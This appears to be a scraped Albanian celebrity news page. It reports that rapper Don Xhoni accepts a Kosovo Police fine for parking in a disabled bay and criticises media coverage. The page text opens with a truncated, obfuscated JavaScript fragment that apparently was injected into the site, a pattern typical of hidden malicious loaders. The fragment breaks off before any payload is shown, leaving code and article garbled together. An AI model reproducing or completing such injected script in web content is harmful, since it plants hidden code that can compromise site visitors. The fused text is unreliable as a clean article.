;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Don Xhoni dënohet sërish nga Policia por këtë herë pranon gabimin!

By

Reperi Don Xhon dje pasdite publikoi fotografi të veturës së tij më të re.

Por, një gabim i tij u raportua në portale. Ai e parkoi makinën e re keq, madje duke zënë vendin e dedikuar për personat me aftësi të kufizuara.

Ai ka reaguar sot, ku ka treguar se për zhvillimin në fjalë, e ka marrë dënimin e merituar nga Policia e Kosovës.

“Absolut ka qenë gabim që e kam ndaluar aty [veturën] për pak minuta sa me e realizu foton por e vërteta dhe vëtëm e vërteta është që nuk e kam bërë me qëllim pasiqë nuk e kam parë fare simbolin. Për këtë kam marrë dënimin e merituar prej Policisë sonë që kam shumë respekt për ta dhe kanë shumë të drejtë për këtë gjobë. Edhe unë gaboj dhe nuk ka njëri që nuk gabon por problemi është që përse e bëni mizën elefant? Për pak klikime që ju sjellin pak para?” – është shprehur Doni.

Reagimin e tij të plotë ku merret me mediat për të disatën herë, i pakënaqur me raportimet e tyre për të, e gjeni në vijim. /Prive.al

Artikuj të ngjashëm